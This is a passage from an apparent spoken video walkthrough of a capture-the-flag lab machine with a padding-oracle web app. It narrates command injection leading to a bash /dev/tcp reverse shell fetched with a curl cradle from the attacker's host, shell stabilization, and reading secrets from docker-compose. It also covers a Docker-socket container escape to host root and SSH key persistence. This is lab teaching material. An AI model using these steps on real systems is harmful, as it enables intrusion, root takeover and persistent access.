bash. Here I get that one-liner. So I use this text editor to modify this IP address. 10.14.86.9, I suppose that's my IP address, and I'm going to listen on port 9001. Okay, 10.14.86.9 port 9001, and this looks fine. So this is the command I want to execute. I go here, and before that I enable my listener. Okay, I split this window, nc-lvnp 9001. I enable my netcat listener. Sorry, I go to this Sublime text and copy this. My IP address is 10.14.86.9. That's the IP. Fine. I go here and put this command and URL encode it. Fine. Now when I send this, I get the message okay, but I'm not getting the shell. What I could try here, I tried this, but it is not giving me the shell. What if I try to, it might be happening because of the special characters in this shell command. Maybe I'll do one thing. I'll go and verify whether the netcat exists on the destination. I go like this. Sorry. Yeah, I put like this. NC. If it exists, it will give me the positive response. No, it does not exist. But when I put wget, it is there. Curl is also there. in that machine. Fine. Now I'll try to do one thing. I'll try to encode this. Base 64. I'll make sure there are no special characters like plus or equal sign. So for that, to eliminate that, I'm just moving this two characters backwards and this one. Now I don't see any special character except that equal. Now the equal is eliminated, but I got another weird. Okay, I need to go and do like this. Okay, I think I'll grab this one and echo wrong clipboard. Paste this here. Base 64 -d pipe it into bash. So if I do like this, I need to get the shell. Now this shell works. This one is working. Okay, I go here. I initiate this listener again. Let me clear the screen and initiate. Yeah. Now I need to move it to the system clipboard like this. How about giving like this? Okay, I go to the Bob suite and here I give this command. I URL encode it and send this command. I still not getting the shell, reverse shell. So I'll do one thing. I'll simply create one bash script and I use a cradle. I initiate my web server. Since wget and curl exist on the target, I'll make the target to request my system, grab the cradle, grab the bash script, and execute it in a different request. So I'll just do it in that way. Okay. I go here, make a directory www. Okay, and here if I go to this one, I grab this. Echo, not echo, touch, sorry, cd www touch shell.sh. How about that? And nano shell.sh, and here I'm pasting it. I add the shebang line usr bin n bash. I think this one looks fine. I read this. Sorry, I read this. Yes. Okay. Now I have this shell with me, and I make it chmod +x. It's not required, I guess, but I'm just making it. Okay, I have this, and I initiate Python web server HTTP to serve this bash script. Okay, now I'm serving the bash script, and I also have my listener on. I go to this place and put a command. Command like maybe curl http://10.14.86.9 port 8000 to access the web server, and file name is shell.sh. I think this is the file name. Yes, I go here and URL encode this and send this connection. It is okay. Looks like it executed properly. Now the next thing I need to do is to trigger the shell. I pass the shell here. I pass the shell to the target system. Now all I need to do is to trigger it. I URL encode it and send this. So once I send this, I need to see the reverse shell. Am I seeing it here? (9001 10.14.86.9) looks fine. Or how about executing like this. Yeah, how about executing like this? Server error, it's not existing. Or I simply give this. Why it is not working? Did I use the proper shebang lane? Shebang bash. Okay. Nano shell. Looks like I used it properly. I'll replace it though. Bash -i dev tcp 10 14.86.9 9001. Looks okay. Looks fine. I'm not getting the shell somehow. Going it again. Executing the previous command, curl 86.9. Okay, I think I need to output it. A blunder mistake. -o. Okay, I'll go here and -o shell.sh. I need to output it in the file, right? So I didn't do that before. Now it looks fine. It's outputted, and I go and execute that directly. Now I got the shell. Look at this. Fine. Now I got the shell, and I do have Python, I suppose. Let's see. Yes, I do. I stabilize the shell. Python -c import pty dot spawn bin bash. Fine. Executed, and control Z stty -a to see the rows and columns. 25119. Okay, stty raw minus echo foregrounding the process. Stty rows equal to 25 and stty calls on the 119. Okay, yeah, it's done. Export term equal to x term. Okay, all right. Now I'm able to clear the screen and use the tab key. Fine. I see where I am. I'm actually in a Docker environment. You can see it right away. And I see a folder, app directory. Let me execute a command. Who am I? I'm a root. I'm a root of this container. So I have an enough privilege, and I do see an app folder. So this is where the codes related to this application is stored. To grab the second flag, I need to dig around the container. So let me get into this app directory as it is relevant to the context of this container. Here I see a lot of files. Let me see the Docker file first. What happened here? They are using a Gradle. They are updating. They are installing Docker, making a directory, and they are putting a jar file from home Gradle, and they are just putting it within the directory. You can see this jar file. This is the application, Java archive. So it is actually a Java web application. While we were enumerating the web app, we couldn't see which kind of application, which kind of web framework it is. Now we could see it is actually a Java based web application. Fine. This is the command they used to execute this, java-jar and this jar file. They just executed this jar file to start this web app. Fine. Uh, I'll go to the next one and see readme. What about readme? Cat readme. Simply run docker compose. So since it is a Docker container, I'm using Docker and images to see the list of available images. I see padding Oracle app web. So this is the image, the image of our web application, and I see Gradle and open JDK. What is Gradle? Gradle. Gradle is a built automation tool to multi-language software development. It controls the development process in tasks of compilation package. Looks like some development tool, so it can be used, I suppose. I haven't used this, but looks like open source build system to choice for Java, Android, Kotlin developers, from mobile apps to microservices, from small startups to big enterprises to deliver better software and faster. Okay, it's like a build tool. Fine. What else? Docker images or Docker PS. How about that? To see the list of running container, and I can see the container ID here, and this is the Docker container currently running. It's the web application, obviously, running on port 8080. All right, let me explore the other files. Setting Gradle. This file looks interesting. I'll go and read this one. Oh, sorry, wrong clipboard. Cat, like this. Project name is THMCTF2. Setting, I just read. Jar file, gradle.bat, a batch script potentially. I don't see any interesting stuff. Gradle W. Okay, how about that? Gradle W. No, nothing interesting. Docker compose.yaml. So let me open this. And I see it's running on port 8080. Docker socket, username, the password, the encryption key, encryption IV. So you see the IV used for the encryption and also the key used for the encryption. We didn't know this before, but we were able to crack the plain text with help of Oracle padding attack since it was exposed. And the CTF Docker flag, and here I'm having a flag, and here is an admin panel flag, which this one is we already grabbed, but this one I don't think we grabbed it. So let me go to the first page, first pane, and move this flag to my system clipboard. Pipe X clip selection clipboard. Yeah, I go slap this in. That's the correct flag, and we need to get the final flag. I think we need to escalate the we need to escape the container. Let me see that. We see the possibility to escape this. First of all, do I have a SSH file? If we have an SSH directory, then we can try to SSH it, but I don't think. 86.9 ping is not found. Okay, so it's a container, restricted environment. What I can do, so I am actually a root. I'm actually a root of this container. With this privilege, I can manage to escalate. I can manage to escape the container. What I can do is, there is a command, and there is a Docker command. Since we can execute the Docker commands, I can run a Docker container with the file system of the host system is set. I'll try to explain it with an gtfo bin command. Gtfo bins. I go and search for the command Docker. You see, I can escalate the privilege to sudo. So this is the command I was talking about. Alpine is the container name. Docker running -v to mount the host's root file system to mount directory of the Docker container, and rm, I'm not sure what it is, but it is a tag, I guess. It is actually alpine, a container name. It could be a container ID as well. Chroot, change the root to mount sh. I think this command will give the root directory access of the host system. So that's what it is doing. It is changing root of, it's using the chroot command against this mount directory. In this mount directory only we kept our host file system, and it is giving the shell access. So I think this is the command that all we need to use, and we need a container image. We don't have alpine container. We don't have alpine image here. I can confirm it with the docker images command. I have only Gradle, OpenJDK, and padding Oracle Web App. Padding Oracle Web App image is already being used in a container. We were able to see that with docker ps command. Now I try to use this one, Gradle, and I take this image ID. So let me grab this command. I paste it here, and I go to this Gradle and grab this image ID. I remove this word alpine and replace it. Now I think when I execute, it will give me the access to my host machine. I should be able to escape the container. Yes, the prompt has changed. Now let's see. ID, I am root again, but this time who am I? I am the root. Let's see the host name. The host name is D5. It starts with D59 and 03. Different from the host name of the Docker container. I think it's a host system. So I execute bash here. Yeah, looks like now we are in a different place. Yes, we managed to escape the container. Now we are on the host system, and I see the flag straight away in this file. Fine. Now what I need to do is to stabilize this. Maybe I'll go to root directory and see I have the SSH directory .ssh ls-la authorized keys. Okay. Also, there is another user in this called Ubuntu. And here is also an SSH directory. So let me go to root. And here if I get into SSH, and here in the authorized key file, I can generate, I can use SSH keygen and generate a public and private key pair, and I can simply paste the content of the public key within this authorized key. Then I change the privilege of, I do use the ch mode on the private key of that, and I can simply grab the stable shell. So let me do that. I'm going to do that only now. Let me come here and I use SSH keygen, and I do mention it as NewYork Flankees, NYF, no passphrase, and I can see it here, nyf.pub. I'll grab this content. Yeah. And here I open this nano. Do I have? I have it. Come here. Please log in as the user Ubuntu rather than root. Okay, let me go to the Ubuntu's directory. Home Ubuntu, and here .ssh, and now I nano to authorized keys. Okay, here we can see bunch of public keys that were added before. Okay, wrong clipboard. All right, I write this exit. Now I go to this one, chmod 600 nyf. Yeah, now I go ssh-i nyf, and the username is ubuntu @ the IP address of the machine target. Here is this IP. Yes, I logged in. Now you can see the hostname has changed. Just to showcase this, I had to log in as the user Ubuntu. Fine. And here you see the entire project as a compressed zip file. And this is the application they were using, vulnerable to Oracle padding attack. Fine, let me grab the flag alone. I go to the root directory, ls-la cat flag.txt. I'm grabbing this, go to this, echo, moving it to my system clipboard, selection, clipboard. Fine, I go and put it here, and that's it. We have done this machine. We may do this beyond root part as we see the project, entire project here. We can just try to assess what went wrong, why this vulnerability happened, but that's actually a big topic. That is a content for a different video. Now I wish to end this video here. Hope you have learned something new, something incredible. I explained it in a clear way, I suppose, and I'll try to make a content like this in future, and I'll try to learn a lot of new things, and I try to share all those things with you for sure. And for now, I'm saying bye. I bid adieu. Okay, I'll catch you next time with another exciting one. Until then, I'm signing off. And if you really like this, do that YouTube algorithms, like, comment, subscribe, everything. I'll catch you next time with another exciting one. Love you all. Cheers, and see you next time.